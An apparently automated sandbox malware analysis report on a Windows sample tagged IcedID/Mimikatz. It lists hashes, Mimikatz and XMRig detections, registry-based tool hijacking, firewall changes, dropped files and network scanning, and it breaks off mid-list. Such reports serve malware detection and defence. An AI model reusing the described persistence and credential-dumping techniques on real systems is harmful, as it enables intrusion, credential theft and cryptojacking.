Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
12-09-2024 05:15
Behavioral task
behavioral1
Sample
2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe
-
Size
11.2MB
-
MD5
b9d70ec3dec6e0094e7b836347e3a82f
-
SHA1
0df28b714c28247ede3eaccd00cf947afa15a6d2
-
SHA256
0de9708bc32f205be75b41f4407f3f9a230eb1b7e04f91db96f4b7dcbe1ba57d
-
SHA512
3bb8dc2bc39f034fe5497d4bc4b85ef28b1b654033e098bcb1e429b975f3e6b85e02f536da2b5ff083e1a6b74a964823a4072488260e0e23f7b996202048236e
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2756 created 1012 2756 yrhtynb.exe 17 -
Contacts a large (17191) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/2564-195-0x000000013F830000-0x000000013F950000-memory.dmp xmrig behavioral1/memory/2564-205-0x000000013F830000-0x000000013F950000-memory.dmp xmrig behavioral1/memory/2564-232-0x000000013F830000-0x000000013F950000-memory.dmp xmrig behavioral1/memory/2564-239-0x000000013F830000-0x000000013F950000-memory.dmp xmrig behavioral1/memory/2564-240-0x000000013F830000-0x000000013F950000-memory.dmp xmrig behavioral1/memory/2564-241-0x000000013F830000-0x000000013F950000-memory.dmp xmrig behavioral1/memory/2564-255-0x000000013F830000-0x000000013F950000-memory.dmp xmrig behavioral1/memory/2564-256-0x000000013F830000-0x000000013F950000-memory.dmp xmrig behavioral1/memory/2564-257-0x000000013F830000-0x000000013F950000-memory.dmp xmrig behavioral1/memory/2564-258-0x000000013F830000-0x000000013F950000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 7 IoCs
resource yara_rule behavioral1/memory/2732-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/2732-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/files/0x0008000000016d29-5.dat mimikatz behavioral1/memory/2908-9-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/2116-134-0x0000000000FF0000-0x00000000010DE000-memory.dmp mimikatz behavioral1/memory/1544-138-0x000000013FDB0000-0x000000013FE9E000-memory.dmp mimikatz behavioral1/memory/2756-188-0x0000000002B00000-0x0000000002B5B000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts yrhtynb.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yrhtynb.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1952 netsh.exe 988 netsh.exe -
Executes dropped EXE 19 IoCs
pid Process 2908 yrhtynb.exe 2756 yrhtynb.exe 2920 wpcap.exe 956 ieevbhheu.exe 1544 vfshost.exe 1472 yrhtynb.exe 1736 zeeblsutf.exe 2732 xohudmc.exe 2940 zmxrwm.exe 2564 uevevu.exe 2704 zeeblsutf.exe 1028 zeeblsutf.exe 2028 zeeblsutf.exe 2688 zeeblsutf.exe 2932 zeeblsutf.exe 2412 zeeblsutf.exe 668 zeeblsutf.exe 1588 yrhtynb.exe 1520 tqtesifgl.exe -
Loads dropped DLL 25 IoCs
pid Process 2836 cmd.exe 2836 cmd.exe 2904 cmd.exe 2920 wpcap.exe 2920 wpcap.exe 2920 wpcap.exe 2920 wpcap.exe 2920 wpcap.exe 764 cmd.exe 956 ieevbhheu.exe 956 ieevbhheu.exe 2116 cmd.exe 2116 cmd.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2756 yrhtynb.exe 2288 cmd.exe -
resource yara_rule behavioral1/files/0x0005000000019fd3-130.dat upx behavioral1/memory/1544-136-0x000000013FDB0000-0x000000013FE9E000-memory.dmp upx behavioral1/memory/1544-138-0x000000013FDB0000-0x000000013FE9E000-memory.dmp upx behavioral1/files/0x000500000001a447-140.dat upx behavioral1/files/0x000500000001a442-144.dat upx behavioral1/memory/1736-148-0x000000013F910000-0x000000013F96B000-memory.dmp upx behavioral1/memory/2564-170-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/1736-175-0x000000013F910000-0x000000013F96B000-memory.dmp upx behavioral1/memory/2704-181-0x000000013F340000-0x000000013F39B000-memory.dmp upx behavioral1/memory/2704-184-0x000000013F340000-0x000000013F39B000-memory.dmp upx behavioral1/memory/1028-190-0x000000013F980000-0x000000013F9DB000-memory.dmp upx behavioral1/memory/1028-192-0x000000013F980000-0x000000013F9DB000-memory.dmp upx behavioral1/memory/2564-195-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/2028-200-0x000000013FAC0000-0x000000013FB1B000-memory.dmp upx behavioral1/memory/2756-199-0x00000000019C0000-0x0000000001A1B000-memory.dmp upx behavioral1/memory/2028-203-0x000000013FAC0000-0x000000013FB1B000-memory.dmp upx behavioral1/memory/2564-205-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/2688-209-0x000000013FD40000-0x000000013FD9B000-memory.dmp upx behavioral1/memory/2688-211-0x000000013FD40000-0x000000013FD9B000-memory.dmp upx behavioral1/memory/2932-217-0x000000013F210000-0x000000013F26B000-memory.dmp upx behavioral1/memory/2932-220-0x000000013F210000-0x000000013F26B000-memory.dmp upx behavioral1/memory/2412-227-0x000000013FEF0000-0x000000013FF4B000-memory.dmp upx behavioral1/memory/2412-229-0x000000013FEF0000-0x000000013FF4B000-memory.dmp upx behavioral1/memory/2756-234-0x00000000017C0000-0x000000000181B000-memory.dmp upx behavioral1/memory/2564-232-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/668-237-0x000000013FB30000-0x000000013FB8B000-memory.dmp upx behavioral1/memory/2564-239-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/2564-240-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/2564-241-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/2564-255-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/2564-256-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/2564-257-0x000000013F830000-0x000000013F950000-memory.dmp upx behavioral1/memory/2564-258-0x000000013F830000-0x000000013F950000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ifconfig.me 18 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 yrhtynb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 yrhtynb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE yrhtynb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE yrhtynb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat yrhtynb.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\zmxrwm.exe xohudmc.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\zmxrwm.exe xohudmc.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 59 IoCs
description ioc Process File created C:\Windows\rbiunekit\rnittcezi\tqtesifgl.exe yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\spoolsrv.exe yrhtynb.exe File created C:\Windows\kertltug\schoedcl.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\AppCapture32.dll yrhtynb.exe File created C:\Windows\rbiunekit\rnittcezi\Packet.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\coli-0.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\libxml2.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\vimpcsvc.exe yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\spoolsrv.xml yrhtynb.exe File created C:\Windows\rbiunekit\upbdrjv\swrpwe.exe yrhtynb.exe File created C:\Windows\rbiunekit\rnittcezi\wpcap.exe yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\schoedcl.exe yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\docmicfg.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\ssleay32.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\svschost.xml yrhtynb.exe File created C:\Windows\rbiunekit\rnittcezi\ip.txt yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\tucl-1.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\schoedcl.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\trch-1.dll yrhtynb.exe File created C:\Windows\ime\yrhtynb.exe yrhtynb.exe File opened for modification C:\Windows\kertltug\svschost.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\cnli-1.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\tibe-2.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\ucl.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\zlib1.dll yrhtynb.exe File opened for modification C:\Windows\kertltug\schoedcl.xml yrhtynb.exe File opened for modification C:\Windows\kertltug\yrhtynb.exe 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe File created C:\Windows\rbiunekit\UnattendGC\specials\docmicfg.exe yrhtynb.exe File created C:\Windows\kertltug\spoolsrv.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\AppCapture64.dll yrhtynb.exe File created C:\Windows\rbiunekit\Corporate\mimilib.dll yrhtynb.exe File opened for modification C:\Windows\rbiunekit\Corporate\log.txt cmd.exe File created C:\Windows\rbiunekit\rnittcezi\ieevbhheu.exe yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\spoolsrv.xml yrhtynb.exe File created C:\Windows\rbiunekit\Corporate\vfshost.exe yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\libeay32.dll yrhtynb.exe File created C:\Windows\kertltug\svschost.xml yrhtynb.exe File created C:\Windows\kertltug\docmicfg.xml yrhtynb.exe File opened for modification C:\Windows\kertltug\vimpcsvc.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\schoedcl.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\exma-1.dll yrhtynb.exe File created C:\Windows\rbiunekit\Corporate\mimidrv.sys yrhtynb.exe File opened for modification C:\Windows\rbiunekit\rnittcezi\Packet.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\posh-0.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\svschost.exe yrhtynb.exe File created C:\Windows\kertltug\vimpcsvc.xml yrhtynb.exe File created C:\Windows\kertltug\yrhtynb.exe 2024-09-12_b9d70ec3dec6e0094e7b836347e3a82f_hacktools_icedid_mimikatz.exe File created C:\Windows\rbiunekit\UnattendGC\svschost.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\docmicfg.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\vimpcsvc.xml yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\xdvl-0.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\crli-0.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\specials\trfo-2.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\vimpcsvc.xml yrhtynb.exe File opened for modification C:\Windows\kertltug\spoolsrv.xml yrhtynb.exe File opened for modification C:\Windows\kertltug\docmicfg.xml yrhtynb.exe File created C:\Windows\rbiunekit\rnittcezi\scan.bat yrhtynb.exe File created C:\Windows\rbiunekit\rnittcezi\wpcap.dll yrhtynb.exe File created C:\Windows\rbiunekit\UnattendGC\Shellcode.ini yrhtynb.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1056 sc.exe 2528 sc.exe 2180 sc.exe 1720 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ieevbhheu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zmxrwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tqtesifgl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened 